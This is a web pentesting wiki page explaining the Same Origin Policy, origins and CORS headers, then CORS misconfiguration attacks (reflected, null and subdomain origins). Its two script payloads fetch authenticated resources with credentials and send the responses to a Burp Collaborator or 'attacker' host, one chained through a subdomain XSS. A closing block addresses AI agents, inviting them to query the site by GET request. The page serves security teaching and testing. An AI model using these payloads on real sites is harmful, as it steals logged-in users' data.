# CORS

## Browser Security Mechanisms

**Cross-Origin Resource Sharing (CORS)** is a policy to relax the [**Same Origin Policy (SOP).**](https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy) Both CORS and SOP policies are browser security mechanisms that limit JavaScript runtime to access resources from different origins (or domains for simplicity). 

### Same Origin Policy  (SOP)

Internally JavaScript can send a request to a different "domain", but the browser will block to pass the response back to the JavaScript's runtime. The rule is simple, the browser will block the response if JavaScript's origin differs from a resource origin.

The SOP has some exceptions which allow cross-domain resource access (out of the JavaScript runtime context). For example, it's allowed to load an image, a font, or a JavaScript source code from a different origin. Right, you can load a JavaScript code from a different origin, but when the JavaScript is executed the SOP will not hand over the response to the JavaScript runtime.

### What's Origin

An origin is a term in browser security upon SOP and CORS decisions are made. The origin is a combination of protocol, domain (host), and port to identify a "source" of a particular resource. The origin can not be simply a domain because there can be multiple web applications on a single host, communicating on different ports and protocols.

When a user or a JavaScript makes a request to a specific URL, the browser adds HTTP header \
"Origin: protocol://domain:port" to inform a web server to adjust CORS headers. Regardless of whether the site supports CORS or not ...when a browser receives a response, it evaluates its origin and considers SOP and CORS rules.

### CORS headers

The server can provide the following CORS headers to relax SOP

**Access-Control-Allow-Origin:** origin \
HTTP header defines which origin is allowed to access resources.

**Access-Control-Allow-Credentials: true** \
allows to accessing authenticated resources. A cookie or authorization header is added by a browser when JavaScript wants to access the resource.  

## Pentesting CORS

CORS attacks assume, there is a XSS vulnerability within the app and these CORS headers set: \
**Access-Control-Allow-Origins:** origin-value**, Access-Control-Allow-Credentials:**true**,** 

The CORS misconfigurations account with reflected origin, null origin and insecure protocol/subdomain origin.

### Origin reflection

![](/files/8u4C6yFPpuakGi0L90mn)

```
<script>
    var req = new XMLHttpRequest();
    req.onload = reqListener;
    req.open('get','https://domain/URI',true);
    req.withCredentials = true;
    req.send();

    function reqListener() {
        location='https://burpcollaborator.domain/log?key='+this.responseText;
    };
</script>
```

### Null origin

![](/files/Uuu4CNT8k4Sa4hmB5WlZ)

### Insecure protocol or subdomain

XSS vulnerability exists in the app running on a subdomain.

![](/files/5RbHg46gUanjnvCy26o2)

```
<script>
    document.location="http://subdomain.domain/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://domain/sensitiveURI',true); req.withCredentials = true;req.send();function reqListener() {location='https://attacker/log?key='%2bthis.responseText; };%3c/script>&storeId=1"
</script>
```

## References

<https://portswigger.net/web-security/cors>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://hackerlab.gitbook.io/wiki.hackerlab.cz/web-pentesting/cors.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.